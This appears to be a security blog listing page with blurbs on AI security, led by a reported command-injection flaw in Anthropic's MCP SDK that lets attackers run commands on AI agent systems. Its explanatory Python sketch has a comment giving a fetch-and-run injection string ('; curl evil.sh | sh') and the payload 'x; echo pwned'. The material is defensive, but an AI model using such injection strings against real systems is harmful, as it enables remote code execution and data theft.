Security | Threat Detection | Cyberattacks | DevSecOps | Compliance

You're Not Watching MCPs. Anthropic's Vulnerability Shows Why You Should Be.

Last week, researchers at OX Security published findings that should stop every security leader in their tracks. They discovered a critical vulnerability baked directly into Anthropic's Model Context Protocol SDK, affecting every supported language: Python, TypeScript, Java, and Rust. The result: remote code execution on any system running a vulnerable MCP implementation, with direct access to sensitive user data, internal databases, API keys, and chat histories. Over 7,000 publicly accessible servers are exposed.
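The class of flaw described here, untrusted input reaching a command executor without sanitization, can be illustrated with a minimal Python sketch. This is not the actual SDK code, and the function names are hypothetical; it only shows why shell-interpolated input enables remote code execution and what the safer pattern looks like:

```python
import subprocess

def run_tool_unsafe(user_arg: str) -> str:
    # Vulnerable pattern: untrusted input interpolated into a shell string.
    # An argument like '; curl evil.sh | sh' would execute arbitrary commands.
    result = subprocess.run(
        f"grep {user_arg} notes.txt",
        shell=True, capture_output=True, text=True,
    )
    return result.stdout

def run_tool_safe(user_arg: str) -> str:
    # Safer pattern: pass an argument list with no shell, so shell
    # metacharacters in the input are treated as literal text.
    result = subprocess.run(
        ["grep", "--", user_arg, "notes.txt"],
        capture_output=True, text=True,
    )
    return result.stdout
```

In the safe variant, an injected payload such as `x; echo pwned` is just a literal search string that matches nothing, rather than a second command.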

AI SecOps Workshop Series: Accelerating Cloud Security Operations with Claude Code and LimaCharlie

In this workshop, we will show how to use Claude Code with LimaCharlie to accelerate cloud security operations. We will have Claude Code deploy agents, create detections, and identify issues before they become incidents. This hands-on workshop demonstrates the power of integrating Anthropic's Claude Code with the LimaCharlie security platform, focusing on how Claude Code can accelerate and streamline cloud security operations, turning reactive tasks into proactive, automated workflows.

Logging Is Not Observability: The AI Security Gap MSSPs Can't Ignore

Every MSSP is fielding the same question from clients right now: "Are we safe with AI?" Most are answering with some version of "yes, we're logging everything." In a recent Defender Fridays episode, Saurabh Shintre, Founder and CEO of Realm Labs, drew a hard line between these two concepts: "You can log prompts and responses, and that's the bare minimum you have to do.

Defending at Machine Speed in the Autonomous Age

Frontier AI models are accelerating the discovery of new vulnerabilities while also enabling those weaknesses to be exploited at speed and scale. This alone isn’t the problem. Trust in AI‑driven security outcomes is. With AI dominating headlines, security leaders are asking what models like Mythos or GPT‑5.4‑Cyber mean for their business. The real issue runs deeper: teams need to be able to trust tools and technology that move at machine speed.

Beyond the Prompt: Data Security in Generative AI Platforms

Generative AI tools have changed how people work and play online. Everyone is excited about the speed and creativity these systems offer. Users often type sensitive info into prompts without thinking about where it goes. Security experts worry about how these platforms handle personal data. It is easy to forget that anything typed into a public bot might be stored. Staying safe means knowing how to use these tools without giving away secrets.

MyClaw Detailed Review: Is This OpenClaw Managed Hosting Worth It?

I've been working in the AI tools space for a while now, and one thing that comes up repeatedly is the gap between open-source AI frameworks and the actual effort required to run them. OpenClaw is a great example - powerful, flexible, and genuinely useful for building AI agents. But getting it deployed and keeping it running? That's a different story. That's what led me to try MyClaw AI. Here's an honest look at what the platform actually offers, who it's for, and whether it's worth the cost.

Building Know Your Agent: The missing identity layer for agentic commerce

AI agents are being deployed in the real world at pace. In the enterprise realm, they’re accessing APIs, shipping code, and running decisioning workflows on behalf of the organizations and individuals who deploy them. Entirely new businesses have sprung up, leveraging AI agents to streamline customer support and sales processes.

LimaCharlie is the most secure way to run AI security agents

The idea that AI agents will run security operations is becoming reality. But most platforms ignore the most important question: how do you secure the agents themselves? In this video I walk through why LimaCharlie is the most secure platform for running agentic security operations and demonstrate the architectural controls that make it possible. We look at the core mechanisms that allow AI agents to operate safely inside a SecOps environment.

Agentic AI at risk after MCP design flaw discovery? #ai #cybersecurity #podcast

In this week's Intel Chat, Chris Luft and Matt Bromiley discuss a design flaw in Anthropic's Model Context Protocol (MCP) that could enable large-scale supply chain attacks on agentic AI systems. Researchers at OX Security found that MCP's command execution allows malicious commands to run silently without sanitization checks or warnings.